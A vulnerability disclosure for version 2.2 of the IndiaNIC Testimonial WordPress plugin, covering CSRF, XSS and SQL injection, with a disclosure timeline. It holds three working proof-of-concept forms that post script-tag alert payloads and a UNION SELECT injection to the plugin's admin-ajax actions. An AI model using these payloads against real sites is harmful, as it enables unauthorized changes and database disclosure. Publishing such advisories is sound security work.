81 lines
No EOL
5 KiB
Text
81 lines
No EOL
5 KiB
Text
Details
|
||
========================
|
||
Application: Testimonial
|
||
Version: 2.2
|
||
Type: Wordpress plugin
|
||
Vendor: IndiaNIC
|
||
Vulnerability:
|
||
- XSS (CWE-79)
|
||
- CSRF (CWE-352)
|
||
- SQL Injection (CWE-89)
|
||
|
||
Description
|
||
========================
|
||
Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials.
|
||
|
||
This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients.
|
||
|
||
Vulnerability
|
||
========================
|
||
This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection.
|
||
|
||
1. Add testimonial form is vulnerable to CSRF and XSS
|
||
2. Add listings template is vulnerable to CSRF, XSS and SQLi
|
||
3. Add widget template is vulnerable to CSRF and XSS
|
||
|
||
Proof of Concept
|
||
========================
|
||
1. Add testimonial
|
||
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
|
||
<input type="hidden" name="action" value="iNIC_testimonial_save">
|
||
<input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
|
||
<input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
|
||
<input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
|
||
<input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
|
||
<input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
|
||
<input type="hidden" name="client_country" value="Belgium">
|
||
<input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>">
|
||
<input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>">
|
||
<input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>">
|
||
<input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>">
|
||
<input type="submit" value="Save Testimonial">
|
||
</form>
|
||
|
||
2. Add listings template
|
||
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
|
||
<input type="hidden" name="action" value="iNIC_testimonial_save_listing_template">
|
||
<input type="hidden" name="id" value="9">
|
||
<input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
|
||
<input type="hidden" name="no_of_testimonial" value="5">
|
||
<input type="hidden" name="list_per_page" value="5">
|
||
<input type="hidden" name="ord_by" value="id">
|
||
<input type="hidden" name="ord_type" value="ASC">
|
||
<input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#">
|
||
<input type="hidden" name="show_featured_at" value="top">
|
||
<input type="hidden" name="no_of_featured" value="2">
|
||
<input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
|
||
<input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
|
||
<input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
|
||
<input type="submit" value="Add Template">
|
||
</form>
|
||
|
||
3. Add widget template
|
||
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
|
||
<input type="hidden" name="action" value="iNIC_testimonial_save_widget">
|
||
<input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
|
||
<input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
|
||
<input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
|
||
<input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
|
||
<input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
|
||
<input type="submit" value="Add Template">
|
||
</form>
|
||
|
||
Solution
|
||
========================
|
||
No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment
|
||
|
||
Timeline
|
||
========================
|
||
2013-08-07 - Email sent to IndiaNIC
|
||
2013-08-08 - Notification left on the plugin's Support board on wordpress.org
|
||
2013-09-01 - No response or patch released. Publicly disclosed |